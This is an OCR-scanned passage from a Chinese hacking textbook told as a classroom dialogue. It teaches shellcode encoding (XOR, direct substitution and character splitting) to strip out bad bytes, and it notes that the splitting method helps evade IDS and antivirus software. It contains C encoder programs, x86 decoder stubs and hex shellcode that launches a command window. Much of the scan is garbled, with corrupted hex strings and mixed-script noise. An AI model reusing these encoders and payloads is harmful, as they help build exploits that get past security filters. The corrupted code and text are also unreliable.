"EST" dispa 1пай11 ан ЫШ хтео бә 

Tw wD FS pU 

"^XFFxS55XxF B" 

"S SG wRBSsXEBSERHSEF [28x 21x RRSx ñuñu ñD ATIS ROS x55 vF AA 

"AXS9*5 xS FABAN JAFA Корхо A A XFCSX33XXD2XXBENRGSXAXEFSX EDAX a5 ER" 

"A x5 B^ RB: 

"ECI aF ATTE" /fsp3 сугеп 8578 01ағсз 

"LEFF EDE"; 


[Globals] >| [AN global membere > | Ф main „|. = 














r EH xarCM 


SL NUM LX RALIONE 口 | X| 
int main() "kare" | 


i 


Scd *x head ые но Ж sop Son VB sardi? ' 
1 а ех З sala sh “da “ba чис 

int 1; воре. ыч 

int nLen; 
unsigned char enShellcode[580 8 
nLen = sizeof(shellCode)-1; 


For(i-8; iinLen; i++} 
{ T 
enshelltCode[i] 一 &helltco m : 6 ста 
H iE ttr 站 RE c Pug 
printfF("S"""); 

Ffnr(isB; itnlenz de) 


i 


y tü continue 





lF(1$1H8 == B && 1!'-H) 
printti" inini р; 
printf['"*sXx€x" ,enshellCode[i]); ЕТЦ ERenshellCedefTz[1H X 


H 
printti in"); 


return Bñ: = 
4 k 


“把 屏幕 上 打印 出 的 代码 粘贴 下 来 ， 得 到 编码 后 的 enShellCode， 如 下 :” 





enshellcode[] = 

"NXC2NX1CNX7bNxaANXbB7NXC7NXC7NXC7NX51Nxd2" 
"NX63NxdaNx51Nxd2NXx62NxcANx5b1Nxd2Nx61Nxc1" 
"\x51\xd2\x60\xd4\x51\xd2\x6f \xc5\x51\xd2" 
"\x6e\xc3\x51\xd2\x6d\xb9\x51\xd2\x6c\xd3" 
"Nx51Nxd2Nx6bNxdbNx51Nxd2Nx6aNxdbNx2dNxf3'' 
"NXxX8Nx71Nxe0Q0Nxc5Nx1aNxd2Nx63Nxc7Nx68Nxc2'' 
"NX67NXC2NXA1CNX7bNx14Nx7bNxbbNx2f NxfANxf8" 
"NxfaNxfaNxdeNxd2Nx63Nx2f Nxf6Nxf9Nxf3Nxb9" 
"Nx1eNxd2NXx6f Nx2f NxfANxf8NxfaNxb5Nx1eNxd2" 
"Nx6bNxaANXABNXATNXC2NX68Nx1aNxd2NXx63Nxc7" 
"NX2TNX54ANX38NxX96Nxef Nx68Nx47" 


“再 把 我 提取 出 的 decode 放 在 前 面 融 ok 了 ! "古风 说 道 。 
“好 ， 我 们 把 它 合 起 来 就 是 这 样 的 : ” 


AllShellCode[] = 
// 先 是 decode 
"NXEBNx10NxX5ANxX4ANx33NxC9Nx66NxB9Nx00Nx62' 
"NX80NX34ANXOANXO97NXE2NXFANXEBNXOBNXE8NXEBNXFFNXFFNXFF" 
// 后 面 跟 enShellCode 
"\XC2\x1c\x7b\xa4\x57\xc7\xc7\xc7\x51\xd2" 
"\x63\xda\x51\xd2\x62\xc4\x51\xd2\x61\xc1" 
"\x51\xd2\x60\xd4\x51\xd2\x6f \xc5\x51\xd2" 
"\x6e\xc3\x51\xd2\x6d\xb9\x51\xd2\x6c\xd3" 
"\x51\xd2\x6b\xdb\x51\xd2\x6a\xdb\x2d\xf3" 
"\х8\х71\хеб\хс5\х1а\ха2\х63З\хс7\х68\хс2" 
"NX67NXC2NXA1CNX7bNx14Nx7bNxbbNx2f NxfANxf8" 
"NxfaNxfaNxdeNxd2NXx63Nx2f Nxf 6Nxf9Nxf3Nxb9" 
"Nx1eNxd2NXx6f Nx2f NxfANxf8NxfaNxb5Nx1eNxd2" 
"Nx6bNxaANXABNXATNXC2NX68Nx1aNxd2NXx63Nxc 7" 
"NX2TNX54ANX38NxX96Nxef Nx68Nx47" 


“好 ， 我 们 来 验证 一 下 ShellCode 的 功能 吧 ! "老师 说 。 


“好 的 ， 我 来 1 "古风 生怕 别人 抢 了 他 的 功劳 ， 边 组 合 边 说 ,，“ 用 前 面 教 过 的 验证 方法 把 上 面 那 
^ 2н FH ((void(*)(void)&AllShellCode))58 íT £ 4 7 ES 230 38 8, 3x ELS 1 T xorAll.cpp. СЖ% 
RAAZ) 


“执行 看 看 呢 ? "老病 说 道 。 


“好 哩 | 编译 、 执 行 ， 如 图 5 一 8。” 





. over xor - El X rp X ve ++ - [over_xor.cpp] D I 
|Ё 文件 编辑 查看 BA 工程 编译 工具 Driverstudio 窗口 帮助 


Jm | ug > Ha Y = = mme | а [copy -| p" | 
|| {Globals} = [All global members || main 1 ~ |а y Z 
$e ИВЕ |[over. xor v ||Win32 Debug -| & (An x | ВЕШ 


a] xl "include &windous.h? 

char ShellCode[] = 

8 此 是 xoF decode 
UXXEBXxX1U0*Xx5fü x54 x33XxCOx663xBO*Nx BBN B2"' 
UNXxBBNXxS37SxBHASNxO7NXE2ZNXFRNXEBXX B5SxESSEEBSEXEFFXEXFFXFFE" 
ғғ 91 епѕһе11Соде 
"AXCZXAXTCXXZDXXxall'x5o7XxcZXAXCZXXCZXX51TXxd2" 
"Ax63XxdaXx5TXxd2x62XxchVx51TXxd2Xx6lXxc1" 
UXXB51Xxd2Xx6 0\ xdh\ x w 
"\хбе\хсЗ\х51\ха2\х!‹ Command — 
"\х51\ха2\хбһ\ db vet НЕНИ Mi AME Corn 1999-1999. 
"UAXBXAXZ7TXXxelNxc5xNx1. 

UAXOZXECZ2XXTCXX7bx- EROR 
"AxFaMxFaxxTeXxd2Xxi 
"UAxTleXxd2Xx6FXx2FXxI 
Rb aa Ri 
"AKZO JS JÓK 


























91-1281 пе 













int main(í) 





((void (*)())&ShellCode)(); 


return 0; | 
k 


Ready | Ln11,Col 43 ВЕС COL OVA [READ 


Artel) алко > | 311.6 | GD over_... | *) 5 ma... gb over. ... WIEHE... |[Bi comm... 信友 本 区 名 ЯН | 19:55 
“了 哈哈， 成 功 了 1 "古风 得 意 的 说 。 














“但 是 ，" 老 病 连 忙 提醒 大 家 “我们 的 解码 代码 decode 首 先 要 目 己 符合 规范 ， 但 这 里 ?” 
“哎哟 1 decode 里 面 的 第 9 个 字 节 还 是 00 呢 ! " 眼 尖 的 女生 叫 了 起 来 。 

这 下 台 下 炸 开 锅 了 , “decode 本 身 还 不 合法 呢 ! ” 

古风 的 脸 刷 得 一 下 红 得 像 个 大 荣 果 。 

小 倩 愉 声 对 宇 强 说 :“ 怎 么 会 这 样 啊 ?” 

宇 强 小 声 的 回答 :“ 应 该 可 以 解决 的 吧 ? 看 看 老病 怎么 说 。” 


老 证 笑 了 笑 : “我 只 是 想 提 醒 大 家 ， 写 ShellCode 时 一 定 要 仔细 。 这 里 的 00 很 好 解决 ， 一 会 儿 
再 说 ， 我 们 先 总 结 一 下 xor 方 法 的 优 缺 点 。” 


5.2.5 PKPA 


“Xor 大 法 是 最 早 使 用 同时 也 是 现在 最 常见 的 编码 方法 。” 老 病 总 结 道 ，“ 它 最 大 的 好 处 是 编码 和 
解码 都 比较 简单 ， 而 且 也 可 以 避 开 一 定 的 字符 ， 上 比如 ASCII 为 0 的 字符 ， 用 Xor 方 法 经 过 编码 后 
束 会 变 成 其 他 的 值 ， 从 而 避免 被 截断 。” 


“该 方法 也 有 一 定 的 适应 性 ， 比 如 刚才 王强 同学 说 的 ，ShellCode 里 面 如 果 有 0x97， 异 或 Key== 
0x97， 正 好 变 为 非法 的 0 ; 那 我 们 还 可 尝试 改变 Key 的 值 ， 站 至 完全 合法 为 止 。 


"sm, Ш | "大 家 领会 到 了 。 


“当然 ， 这 种 方法 的 缺点 也 很 明显 ， 当 限制 字符 较 多 或 限制 字符 是 个 较 大 范围 时 ， 那 很 有 可 能 
找 不 到 合适 的 Key 来 符合 限制 要 求 。 在 这 种 情况 下 ， 我 们 融 需 用 其 他 算法 来 实现 编码 和 解码 
f. ” 


HARAR BIS :“ 优 缺点 都 明日 了 ， 但 刚才 decode 代 码 本 身 还 有 0x00 呢 ， 怎 么 解决 呢 ? 
“关键 是 要 知 其 然 ， 更 要 知 其 所 以 然 。 真 正清 楚 后 ， 解 决 起 来 整 简 单 了 。 





5.3 简便 的 变形 做 调 法 


“如 果 ShellCode 只 是 偶尔 几 个 字符 出 现 了 问题 ， 我 们 融 不 必 下 目的 改变 Key 的 值 ， 可 能 会 越 改 
越 糟 。 苗 至 ， 解 码 代 码 本 身 就 有 非法 字符 ， 就 像 刚 才 古 风 同 学 提取 的 decode 一 样 。 因 此 ， 我 
们 改变 Key 的 值 也 没有 用 处 。” 


тЫ А,В RT T o 
“ 那 咱 办 了 ?3 " 台 下 问 道 。 


“此 时 我 们 要 想 办 法 对 代码 进行 小 量 微调 ， 即 使 用 微调 法 1!” 


5.3.1 变形 的 原理 


“微调 法 束 是 对 不 合 要 求 的 字 答 进行 等 价 指 全 变换。 上 比如 ，1IS 漏 洞 里 不 能 有 0x20， 那 么 对 指 倒 
mov eax, 20h 就 可 改 为 mov eax, 24h; sub eax, 04h ; 其 效果 是 一 样 的 ， 都 是 eax 减 去 0x20， 
但 避免 了 出 现 0x20。” 


“微调 法 原理 束 是 在 不 改变 指 命 功能 的 情况 下 个 别 改 变 使 用 的 代码 。 这 种 等 价 变换 法 对 有 少量 
字符 限制 的 情况 还 是 比较 实用 的 。” 老 病 说 道 ,，“ 我 们 可 用 这 种 方法 解决 刚才 decode 的 问题 。” 


5.3.2 完善 的 DOS 窗 口 程序 


“大 家 先 看 看 刚才 decode 里 面 的 0x00 是 怎样 出 现 的 。” 老 羡 提 醒 道 
大 家 都 盯 着 图 5 一 6 仔细 的 看 。 


“ 哦 1” 古 风 叫 了 起 来 ，“ 是 mov ecx, 0x200 那 句 指令 出 现 的 1 0x200 融 是 0x0200， 那 儿 有 个 
“对 ! 我 们 mov ecx, 0x200 ， 融 是 把 ecx 赋 成 0x200， 用 来 指明 enShellCode 长 度 是 

0x200, "hj, 

“k | 我们 把 它 变 为 0x201 束 行 了 1 ?这 下 大 家 都 明白 了 。 


“是 啊 ! 我 们 把 0x200 改 成 0x201， 不 就 没有 0x00 了 吗 ?重新 把 decode 和 ShellCode 合 起 来 ， 
到 decodeAndenShellCode2。” 


大 家 喷 了 起 来 :“ 快 试 一 下 效果 啊 ! ” 


“OK 1 编译、 执行， 弹出 我 们 的 DOS 对 话 框 了 1 如 图 5 一 9。 


|E 文件 më 查看 搬入 IS == тд г Driverstudo 窗口 8285 -181.х] 


[a|s m Ыб: ъа 2-с. o lr 了 | 各 
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char She1lcode[] = 

H-A оме) ЛЕ хог "con | PETER 
XXEBXX18*x5flV x hf x GN x66 xB9x 81x B2 

UXAXBÜOXXIANX ORSXOZNEXEZNRFARNEXEBNX UBXXEBXXEBXXFFXXFFXKXEF" 

ё#Г5@ еп$һе11бойе 

UXAXC2XÀXTCXX/DXXallyxb IVXCZXXCAIXXCZXX51Xxd2" 

UXAx63XXdaNx51xd2x62xchXx51TXxd2xó61xc1" 

UXx51XÀxd2*x6HXxdhi*sx51Vxd2x6FXxc5Xx51Xxd2" 

и хбоеұхсаҳхо 1А ЫЫ па Ш ви fh ва 8 ва EN вв um ww. TER 

"A x51xd23xó6b*5 c^ Command Prompt 

UXxBXxZ1xeB HicrosoftCR5 Windows DOS "n 

"Ax67XXC2XAXTCA CC»Copyright Microsoft Corp 1990-1999. 






"AxfaXxfaxxle* ЕИ: 
"AxleXxd2*x6f*5 
"Ax6DXxal'xH5^ 
U"AXx2ZFXXSARNX38S 


int main(í) 





((void (*)())&ShellCode)(); 


return 6; 








Ln 22, Col 2 HEC COL |OVR [READ 


dnos | | 3411.6 | ahi — zl Dover.. | “) 5 те... GA over.. |[@ comm... dee nts 19:54 
та UE ВУ : “ЖЛЕ Z ix Z, А ! ” 








“不 ， 这 只 是 一 个 分 析 是 否 彻 夸 的 问题 。 在 学 习 上 ， 大 家 .一定 要 脚 路 实地， 把 问题 真正 研究 
透 。 对 于 缓冲 区 浴 出 编程 来 说 ， 更 是 态度 决定 一 切 | 82 f an ?” 


“清楚 了 1 "同学 们 响 宛 地 答 道 。 


“好 ， 大 家 先 休息 一 下 ， 下 节 课 我 们 继续 深入 探讨 。” 


4 E REES 4 A 


课 间 休息 时 ， 宇 强 和 小 倩 聊 了 起 来 。 宇 强 心 里 乐 开花 了 : 真是 近水楼台 啊 .…… 


小 倩 说 :“ 看 来 什么 事情 都 要 知 其 原因 才 有 意义 啊 ! ” 


“ЕЦЩ ! 记得 小 时 候 老 症 布 置 “ 一 件 趣事 "的 作文 ， 我 看 同 昌 写 的 是 给 金鱼 作 手 术 ， 觉 得 很 有 
趣 ， 也 就 模仿 守 了 一 篇 。 那 个 时 候 我 连 金 鱼 是 什么 样 儿 都 不 大 清楚 ， 结 果 出 各 了 ， 运 气 也 不 
好 ， 大 家 交叉 改作 文 ， 我 的 那 篇 被 老病 抽 到 上 人 台 念 出 来 ， 结 果 被 大 家 狂笑 ， 念 到 一 半 ， 老 渍 
MATAR T ue. : 


“哈哈 .…………” JI MIROR I Т 


“不 能 怪我 ， 小 时 候 我 太 条 了 ， 记 得 小 学 2 年 级 时 有 篇 课文 ， 大 意 是 教 宇 的 果子 脚 断 了 ， 第 二 天 
却 好 了 。 老 病 问 小 明 ， 小 明说 不 是 他 修 的 ; 老病 问 小 华 ， 小 华 也 说 不 是 他 修 的 ; тр, € 
怪 ， 难 道 是 梨子 自己 好 的 吗 ?课文 就 完了 。 你 明白 什么 意思 吗 ? ” 


"RÀ, xe IB ЗЕ ЛХ ER aU. 1 "小 倩 说 道 。 


“是 啊 ! zEJpIispibiIISGROX, IRZXKCERG. ERT = m, ЕХ) Эн) SB xA. 
意思 。 让 到 5 年 级 重读 课文 时 才 突 然 明 和 白 l” 


“不 会 吧 ， 小 时 候 你 这 么 笨 啊 1 一 点 都 不 像 现在 的 你 。 

“什么 啊 ， 这 说 明 我 小 时 候 把 联 明 都 存 起 来 了 ， 现 在 才 用 。” 
RIR...” J MARRE T 

此 时 老病 在 台 上 说 道 : "好 了 ， 大 家 安静 ， 我 们 继续 上 课 。” 


5. 4. 1 蔡 换 的 思想 

老病 说 : “刚才 的 异 或 法 ， 如 果 编 码 后 的 enShellCode 还 有 非法 字符 ， 我 们 就 只 能 改变 Key， 重 
新 试 一 次 ; 但 这 样 有 可 能 又 在 另外 的 位 置 出 现 非法 字符 ， 很 抹 烦 1!” 

“EW, 0) й. AANA 25. 

"我们 可 以 加 以 改进 1 在 编码 时 先 对 每 个 字符 都 进行 异 或 编码 ， Nee 或 后 还 是 非法 
字符 ， 则 再 单独 对 该 字符 进行 处理， 变换 成 符合 要 求 的 字符 。 

“Hk ? 单独 义理 0? 同学 们 感 /CN >s 兴趣 的 说 道 。 

“对 ， 这 束 是 直接 替换 法 。”" 老 病 解 释 说 ,，“ 单 独 对 字符 处 理 的 方法 很 多 ， 但 关键 是 大 家 要 懂得 
个 思想 


J 
JÒN UNO 


这 
小 倩 悄悄 对 宇 强 说 : “看 ， 老 病 一 再 强调 理解 能 力也 1 ” 
宇 强 郁闷 的 说 :“ 我 知道 啊 ， 你 什么 意思 了 嘛 .…...” 
“嘿嘿 ! "小 倩 笑 而 不 道 。 

“好 ， 你 等 着 看 我 超 强 的 理解 能 力 ! * 

此 时 老病 在 台 上 说 : "我 们 来 看 看 如 何 实现 吧 ! ” 


5.4.2 编码 C 程 序 


老病 说 道 : “这 里 用 的 方法 ， 是 将 ShellCode 的 每 个 字符 'ShellCode[i 先 和 Key 作 异 或 得 到 
temp， 如 果 人 合法， 融和 直接 将 temp 保 存在 'enShellCode[i 当 中 ; 如 果 不 合 法 ， 则 
将 'enShellCcodeli 存 为 "0'， 而 把 enShellCodeli+1] 存 为 temp+'0'。 算 法 示意 图 如 图 5 一 10。， 





“那么 ，'0' 是 个 标志 ?" 宇 强 问 道 。 


"sp, 当然， 我 们 也 可 把 '0' 换 成 其 他 的 合法 字符 。 解 码 时 遇 到 标志 字符 时 (这 里 是 ‘0') 就 知道 
后 面 一 位 才 是 真正 的 ShellCode， 要 作 一 定 变换 才 可 恢复 原来 的 值 。” 


“我 们 来 看 看 程序 DirectExchange.cpp 吧 《光盘 有 收录 ) 【懂得 了 思路 ， 也 比较 简单 。” 


#include <string.h> 

#include <stdio.h> 

#define KEY 0x97 

unsigned char ShellCode[] = "Nx41Nx00Nx42" ; 
int main() 


int i, k; 

int nLen; 

unsigned char temp; 

unsigned char enShellCode[500]; // 编 码 后 的 enShellCode 
nLen = sizeof(ShellCode)-1; // 获 得 ShellCode 的 长 度 


К = 0; 
for(i=0;i<nLen;++i) 
{ 


temp = ShellCode[i]^KEY; // 先 异 或 KEY 
// 对 一 些 可 能 造成 shellcode 失 效 的 字符 进行 替换 
if(temp«-Oxif|| temp=='.'|| temp== / || temp== 0 | | temp=='?') 


enshellcode[k]='0'; 
++k; 
temp+=0x31; 


} 
enShellCode[k]-temp; // 保 存在 enShellcode 中 
++k; 


} 

// 格 式 化 打印 enShe1L1code 
printf( ух "n ) ; 

for(i-0; i«k; i++) 


if(i%10 == 0 && i!-0) 
pr iii Ra AE 
printf("NWx9*x",enShellCode[i]); // 闻 编码 后 的 enShellCcode 打 印 出 来 


} 
printf("N"Nn"); 
return 0; 


5.4.3 解码 汇编 


— ， 解 码 思想 也 就 很 容易 理解 了 。 解码 就 是 判断 enShellCode 的 每 个 字符 ， 
如 果 不 是 ， 就 直接 异 或 Key 恢 复 回去 ; 如 果 是 0'， 就 把 后 面 的 那个 字符 减 去 '0' 再 异 或 Key， 
е 复 以 前 的 Shellcode。 "老病 说 得 很 快 ，“ 我 们 边 看 代码 边 理解 思路 吧 !” 


老病 打出 如 下 的 解码 汇编 exchangeDecode.cpp : 


]mp decode_end 

decode_start: 

pop edi 

push edi 

pop esi 

xor ecx,ecx 

mov ecx,0x101 // 要 解码 个 数 

Decode_ loop: 

Lodsb //[esi] -> eax 

cmp al,0x30 // 判 断 是 否 为 标志 07 

jz special char clean // 如 果 是 ， 就 跳 去 特殊 字符 处 理 
store: // 保 存 

xor al, 0x97 // 异 或 KEY = 0x97 

stosb // 保 存 解 码 后 的 ShellCode 

loop Decode loop 

jmp decode ok 

special char clean: // 特 殊 字符 处 理 

lodsb // 读 后 一 位 字符 

sub al,0x31 // 把 后 一 位 字符 减 去 0x31， 就 恢复 原来 的 值 
]mp store 

decode end: 

call decode start 

decode ok: // 其 余 真 正 加 密 的 Shellcode 代 码 会 连接 在 此 处 


“首先 还 是 一 样 ， етее , “如 下 代码 是 定位 enShellCode 位 置 。 在 前 面 异 或 大 法 里 讲 过 ， 大 
ЭКЕЛГЕН ES OSUBAS T 


jmp decode end 
decode start: 
pop edi 


decode end: 
call decode start 


“ 接 下 来 的 代码 是 把 解码 的 个 数 赋 给 ecx， 解 码 一 个 字 节 ，ecx 右 减 1， 站 至 ecx 减 为 0， 束 表示 
解码 结束 了 ， 跳 到 还 原 后 的 ShellCode 中 执行 。” 


xor ecx,ecx 
mov ecx,0x101 // 要 解码 个 数 





“然后 ， 如 下 代码 用 于 判断 是 否 为 标志 ， 如 果 是 ， 束 不 管 标志 ， 去 处 理 后 面 一 
0x31， 恢 复原 来 的 值 。” 


一 减 去 


E 


cmp al,0x30 //#Ш те ss 

jz special char clean // 如 果 是 ， 就 跳 去 特殊 字符 处 理 
special char clean: // 特 殊 字符 处 理 

lodsb // 读 后 一 位 字符 

sub al,0x31 // 把 后 一 位 字符 减 去 9ox31， 就 恢复 原来 的 值 


`= 
` 


“最 后 ， 如 下 代码 就 是 异 或 Key， 恢 复 成 原来 的 ShellCode 并 保存 。 


xor al, 0x97 // 异 或 KEY = 0x97 
stosb // 保 存 解 码 后 的 ShellCode 


"eR, — E = 带 看 思路 去 理解 。 "E УД 肌 次 强调 。 
“ 电 ， 我 现在 清楚 了 ! " 宇 强 对 小 倩 说 。 


“好 了 ， 我 们 用 直接 替换 法 来 对 开 DOS 窗 口 的 程序 进行 变形 ， 看 看 编码 程序 和 解码 程序 是 如 何 
使 用 的 1” 老 病 说 道 。 


5.4.4 B #1 DOS 0125 


“首先 ， 我 们 编码 。 ааа н "老病 说 道 , “编码 程序 为 




































































DirectExchageCMD.cpp O6 & Ix) ， 执 行 效 果 如 图 5 一 11。” 
` DirectExchangeCuED 一 Wicrosoft Tizual CH 一 [DirectEzchange LEI. cpp] 
| FÌ Fila Edit Мат Inserti Project Juild Tools Ikiverftulio Window Help es =l] Х| 
È ш Ы @ (Bm 2 - ` + IP, P: ба 53 oce md “s 5 
[GInhals] E (Ай ginhal memhers > | @main -| кеа 








=] x] eT NT ND xD МЛ ГГ хер S NES = 
"paa" 
"1wcgualF x Hara" //sp3 systenilibitüx788afFc3 
UAXFFXEDE'; 
int main() 
t 
int 1, E; 
int nLen; 
unsigned char tenp; 
unsigned char enShellCode[5BH]; M zillgenshelltode 
пеп = sizPaoF(ihellCaode)-1; TS shelltodedE-nE 
k = 0; 
Го (1—=й;1<Япїеп; ii) 
{ 
temp = ShellCode[i]^ KEY: РР RREY 
FA — Е ЈЕВ Re shellcod = ка. 
iF(temp<=Dz1F|| tenp=='. Шш Study И SAEM Abook ҮКТҮҮ ҮТҮ 
Мыз = Га ы = Jh 5, xad pns г, s S LES 
enshieliCcude[k]-* & ; à 
a "к; 
tempe- 8x11; 
H 
enshelltade[k]-temp; 
++; 
H 
г ДЕТ П еп5һе116оде 
printf"); 
For(i-B8; ik; i++} 
{ 
if(it1B8 == 0 && 1%=й) 
Тее "МАМАТ OU); 
BrinLF(O "y YZK U eS 116Gu | 
, | 
+Í | 





“ 哦 ， 我 们 把 编码 后 的 enShellCode 站 接 粘 贴 下 来 就 可 以 了 。 有 了 自动 化 的 打印 程序 ， 好 方便 
ШШ | "大 家 都 感叹 道 。 


“ 嗯 ， 这 样 得 到 的 enShellCode 为 : 


enshellcode [] = 

"NXC2NX30Nx4dNx7bNxaANXxbB7NXC7NXC7NXC7NX51" 
"Nxd2Nx6e3aNxdaNx5bd1Nxd2Nx62NxcANx5b1Nxd2Nx61" 
"NXC1NXx51Nxd2Nx60NxdANxb1Nxd2Nx6f Nxc5bNx51" 
"NXd2Nx6eNxc3Nxb1Nxd2Nx6dNxb9Nx51Nxd2Nx6c" 
"\xd3\x51\xd2\x6b\xdb\x51\xd2\x6a\xdb\x2d" 
"\xf3\x30\x39\x71\xe0\xc5\x30\x4b\xd2\x63" 
"\xc7\X68\xc2\x67\xc2\x30\x4d\x7h\x30\x45" 
"\x7b\xbb\x30\x60\xf4\xf8\xfa\xfa\x30\x4f" 
"\xd2\x63\x30\x60\xf6\xf9\xf3\xb9\x30\x4f" 
"NXd2NX6f \x30\x60\xf4\xf8\xfa\xb5\x30\x4f" 
"\xd2\x6b\xa4\x45\x30\x50\xc2\x68\x30\x4b" 
"NXd2NX63NXC7NX30NX60NX54NX38NX96Nxef \x68" 
Да 


“大 家 注意 了 ，"” 老 病 提 醒 道 ,“ 比 我 们 直接 异 或 得 到 的 enShellCode 多 了 14 个 字 节 。” 


“ 真 的 啊 1 "大 家 翻 了 下 前 面 的 笔记 说 道 。 


“这 是 因为 有 14 个 字 节 不 合 要求 ， 编 码 时 就 会 将 其 直接 蔡 换 。 大 家 可 以 看 到 ，enShellCode 里 
有 14 个 \Xx30' 这 样 的 标志 。” 


“是 啊 ! ”同学 们 一 下 明白 了 ， 宇 强 说 道 :"\x30' 后 面 才 是 真正 的 ShellCode 变 换 来 的 啊 ! ” 


“是 的 。 我 们 册 看 看 decode 吧 ! 把 exchangeDecode.cpp 编 译 ， л ЕГ. AS лу BJ 
机 器 码 抄 下 来 。 这 个 方法 讲 过 多 次 了 ， 得 到 的 decode 代 码 如 下 : 


decode[] = 
"NXEBNXABNX5BFNX57NXBENX33NXCONXB9NX01" 
"NXO1NX00NXOONXACNX3CNX30NX74NXO7NX34" 
"NX97NXAANXE2NXF6NXEBNXOANXACNX2CNXx 31" 
"AXEBNXFANXE8NXEONXFFNXFFNXFF" ; 


“我 们 再 把 decode 和 enShellCode 合 起 来 测试 。 构 造 得 到 over_exchange.cpp (25 # IK 
录 ) ， 运 行 效 果 如 图 5 一 12， 成 功 1” 


.over_exchange - AAP X ҮС++-[оа+тег_енсһапде.срр *] Жан а š _ [8| xj 
|Ë) ist S8 25 Жл 工程 编译 ТА Driverstudio 窗口 #8 _| 可 | x| 


ETT EE TE — iw 
= — Го tobe me: global members 司 | main Ше тап 8 йт | 
je s gu 9 [zi [over ехспа а] exchai* "изг D Debug — + |& B o | ' 司 M | 


char ShellCode[] = 
fj 先 星 exchange decode 
“МхЕВ\Х1В\х5Е\хЬ RSEMRIN RCON NBON\V ROT" 
AOAC GN 
UXAX9ZXXBRRNXE2NXFGSEXEBNE ВАХ AG RN" 
"“®%хЕВ\ХЕҢНМХЕВ\ ХЕЙМХЕЕМхХЕРМХЕЕ" 

ё ғеп5ће11Сойе 
UAxC2Xx3BNxhdsx/bxxaliu5ZXxcZXxcZXxcZXx51" 
"UXxd2Xxó63*xdaXx51xxd2Zx62xclx51Xxd2x61" 
"^ xc1 ж БТ Xxd2Z*xà 0“ mer lh =n н E X nord h nr dA ww r= X s| q ú" 
"Axd2Xx6eXxcaNx5 1 ШШШ 
























































"&xüdWx51dWxd2x6b' ШШ EEST ED TS Sq PM Ui ТЕД 
TC Copyright Microsoft Corp 1998-1999. 
“\хс7\хб8\хс2\хб7' Ж АУЕ 


"AxZbXxbbNx3B8xó 0" 
"Axd2x63x3 03x 6 B' 
"Axd2Nx6Fx390Nx 6 0 
"AXxd2XXxó6DxaliNxtb5" 
dO RC NR 
“хт; 

int maim() 


((void (*)())&ShellCode)(); fa 
А 


5.4.5 E SEES VR TE EA] GUB ER 


介绍 完 后 ， 老 病 总 结 道 :“ 该 方法 十 分 巧妙 ， 灵 活 运 用 可 解决 很 多 字符 限制 的 问题 ， 比 如 对 
Cmail 萄 可 把 不 合 规 沁 的 大 写字 母 减 去 一 个 值 变 成 小 写字 母 ， 当 然 ， 在 前 面 要 放 上 一 个 标志 ; 
解码 时 看 见 这 个 标志 ， 融 把 后 面 的 字母 加 上 那个 值 ， 从 而 得 到 了 恢复 。” 


“但 decode 的 代码 本 身 需 要 是 合法 字符 。 如 果 有 举 不 符合 要 求 的 字符 ， 可 采用 微调 的 方式 ， 使 
其 符合 限制 条 件 。 如 果 微调 无 效 ， 可 能 束 需 要 采用 其 他 算法 了 。” 


5.5 字符 拆 分 法 


“编码 的 方法 很 多 ， 从 上 面 几 种 方法 就 可 看 出 。 只 要 满足 图 5 一 13 条 件 的 算法 'F' 和 逆 算 法 'F"， 
都 可 用 于 ShellCode 编 码 变换 ， 如 图 5 一 13。” 





"HE | 那 只 要 有 好 的 算法 和 符合 编码 限制 的 实现 ， 都 可 用 于 ShellCode 的 编码 。” 宇 强 说 。 
字符 拆 分 法 。 





老病 哆 了 一 口水 ， 然 后 说 道 : “对 ， 这 里 再 讲 一 个 重要 的 方法 
“字符 拆 分 法 ?什么 意思 ? 


“字符 拆 分 法 束 是 把 ShellCode 的 每 个 字符 拆 分 成 几 个 其 他 字符 (当然 ， 拆 成 的 字符 要 符合 编 
253458) ， 解 码 的 时 候 ， 把 字符 再 合 起 来 ， 恢 复 成 原来 的 ShellCode。” 


“ 听 起 来 变 有 意思 的 | 实现 起 来 难 吗 ? ”同学 们 问 道 。 
“明白 f BEST, 我 们 一 起 来 看 看 吧 | 


5.5.1 方法 一 Z=A+B 


第 一 种 字符 拆 分 法 ， 是 把 ShellCode 的 每 个 字符 了 拆 分 成 几 个 数字 的 和 。 比 如 拆 成 两 个 ， 即 2 
=A+B, 400x77, 50х77 = 0х01+0х76=0х02+0х75 =...... = 0х38 + 0x39, ' 


ЖЖ ЕХ f DA :“ 因 为 和 的 组 合 方式 有 很 多 种 〈 如 0x77 束 有 56 种 组 合 ) ， 而 我 们 只 选 一 
种 出 来 ， 所 以 我 们 可 以 避免 大 量 的 ASCII 字 符 。 这 样 ， 除 了 decode 外 ， 可 以 有 多 种 变形 ， 对 一 
些 |DS 或 杀毒 软件 都 有 一 定 效 果 。 


“编码 算法 AddCMD.cpp 可 像 如 下 用 C 语 言 实现 。” 


#include<stdio.h> 

unsigned char ShellCode[] = 
"\хЕЗ\х78\хЕЕ"; 

unsigned char BadChar[] = // 不 符合 要 求 的 字符 
"AXOONXFFNX01" ; 

int main() 


| 
unsigned char a,b; 
unsigned char z; 
int i, j, nLen, BadLen; 
bool bSuccess; 
nLen = sizeof(ShellCode) - 1; //ShellCodeXJ/E€ 
BadLen = sizeof(BadChar) - 1，V// 不 符合 要 求 字符 的 长 度 
bSuccess = true; 
for(i=0; i<nLen; i++) 
Ç 
z = ShellCode[i]; // 取 当前 要 拆 分 的 字符 
for(a=1; a<127; a++) 
if(z < a) //z 比 a 还 小 ， 拆 分 失败 ， 结 束 
{ 
bSuccess = false; 
printf("Failed!"); 
break; 
j 
b = z - а; //ünm|lz 拆 分 成 a+b 
for(j=0; j<BadLen; j++) // 判 断 a 和 b 是 否 符合 要 求 
{ 
if(a--BadChar[j] || b==BadChar[j]) //a 或 b 不 符合 要 求 
break; 
j 
if(j»-BadLen) //a、b 都 符合 要 求 ， 打 印 出 来 
{ 
printf("\\x%x\\x%x", a,b); 
break; // 当 前 z 拆 分 成 功 ， 拆 分 下 一 
j 
else 
; //a 或 b 不 符合 要 求 ，j 就 会 <BadLen ; 就 要 改变 a， 继 续 党 试 
} 
if(!bSuccess) // 某 个 字符 拆 分 失败 ， 拆 分 以 失败 告终 
{ 
break; 
j 
if(bSuccess) 
printf("NnSucceess!Nn"); 
return 0; 
j 


“思路 很 清晰 ， 但 程序 似乎 不 大 好 懂 啊 .………" 大 家 说道 。 


“好 ， 我 来 解释 一 下 。'zZ = ShellCodeli 取 要 拆 分 的 字符 ; for(a=1; а<127; a++) 是 依次 党 试 a 
